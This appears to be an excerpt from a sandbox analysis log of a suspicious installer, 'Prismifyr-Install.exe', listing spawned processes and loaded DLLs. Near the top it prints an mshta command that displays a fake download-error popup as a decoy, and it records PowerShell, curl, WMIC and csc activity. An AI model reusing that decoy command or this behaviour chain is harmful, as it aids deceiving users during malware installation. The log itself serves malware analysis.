      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeSection loaded: winmm.dllJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeSection loaded: napinsp.dllJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeSection loaded: wshbth.dllJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeSection loaded: nlaapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeSection loaded: winrnr.dllJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\Prismifyr-Install.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\curl.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
      Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: edgegdi.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: edgegdi.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
      Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
      Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
